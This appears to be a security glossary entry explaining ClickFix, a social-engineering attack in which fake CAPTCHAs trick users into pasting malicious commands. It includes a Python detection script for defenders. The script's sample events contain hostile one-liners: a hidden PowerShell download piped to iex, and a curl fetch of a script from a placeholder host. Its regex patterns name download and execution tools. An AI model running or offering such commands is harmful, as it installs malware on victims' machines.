
ClickFix

ClickFix is a social-engineering technique where a fake CAPTCHA or error message gets visitors to run a copied malicious command themselves. Because the victim launches the command, the attack needs no technical vulnerability.

ClickFix is a form of social engineering in which a prepared web page fakes a problem, usually a cloned CAPTCHA or a browser error message. It instructs visitors to press a short key sequence, and that action, not any technical flaw, is what installs the malware.

How does a ClickFix attack work?

As soon as a visitor clicks the fake prompt, a script copies a command to the clipboard in the background (clipboard hijacking). The instructions then ask the visitor to run it themselves, on Windows through the Run dialog (Win + R, then Ctrl + V, then Enter), on macOS through Terminal. The command uses a legitimate Windows program such as powershell.exe to download an infostealer.
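The sequence above leaves a recognizable trace on the endpoint: an interactive shell started from the Run dialog whose command line fetches something from the network. The following Python script is an added detection example, not code from the original page; it runs over a handful of constructed process-creation events in a hypothetical "parent|image|command_line" layout (not any real product's log format) and assumes that a command entered in the Run dialog is spawned as a child of explorer.exe.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation events (hypothetical "parent|image|command_line"
# layout, not any real product's log format). The .invalid domain is reserved for examples.
SAMPLE_EVENTS = [
    'explorer.exe|powershell.exe|powershell -w hidden -c "iwr http://lure.invalid/x.txt | iex"',
    'explorer.exe|cmd.exe|cmd /c curl http://lure.invalid/s.ps1 -o %TEMP%\\s.ps1',
    'cmd.exe|powershell.exe|powershell -File C:\\Scripts\\backup.ps1',
    'explorer.exe|notepad.exe|notepad C:\\Users\\alice\\notes.txt',
    'explorer.exe|powershell.exe|powershell Get-Process',
]

# Interactive shells a ClickFix lure tells the victim to launch through Win + R.
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Command-line traits of a one-liner that pulls a payload from the network,
# executes it inline, hides its window, or arrives base64-encoded.
SUSPICIOUS_PATTERNS = {
    "remote_fetch": re.compile(
        r"https?://|\b(?:iwr|invoke-webrequest|downloadstring|curl|wget)\b", re.I
    ),
    "inline_exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(
        r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I
    ),
}


@dataclass
class Finding:
    command_line: str
    reasons: list


def parse_event(line):
    """Split one constructed event into (parent, image, command_line)."""
    parent, image, cmdline = line.split("|", 2)
    return parent.strip().lower(), image.strip().lower(), cmdline


def score_event(line):
    """Return a Finding when the event looks like a Run-dialog shell fetching remote code."""
    parent, image, cmdline = parse_event(line)
    # Assumption: a command typed into the Run dialog is spawned by explorer.exe.
    if parent != "explorer.exe" or image not in SHELL_IMAGES:
        return None
    reasons = [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(cmdline)]
    if not reasons:
        return None
    return Finding(cmdline, reasons)


def detect_clickfix(events):
    """Run score_event over every event and keep only the hits."""
    return [f for f in (score_event(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in detect_clickfix(SAMPLE_EVENTS):
        print(f"ALERT {finding.reasons}: {finding.command_line}")
```

The parent-process condition is what separates a pasted Run-dialog command from routine administration: the third event is the same shell with a network-free script run from cmd.exe and is ignored, as is a plain Get-Process typed by a user. In a real deployment the same logic belongs in the EDR or SIEM query language, with the image set extended to whatever other legitimate programs the lures in your environment invoke.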

Why is ClickFix so effective?

ClickFix exploits no software flaw, only the trust people place in familiar prompts. Because the victim runs the command, traditional security software often sees nothing more than a normal user action. Switzerland’s BACS has reported a rise in ClickFix cases since early 2026.

How do you protect yourself against ClickFix?

Never paste a command from a website into PowerShell, a terminal, or the Run dialog. A real CAPTCHA never asks for a system-level key combination. For how the attack spreads, what the numbers say, and what organizations can do, see our full article How Fake CAPTCHAs Fuel ClickFix Attacks.
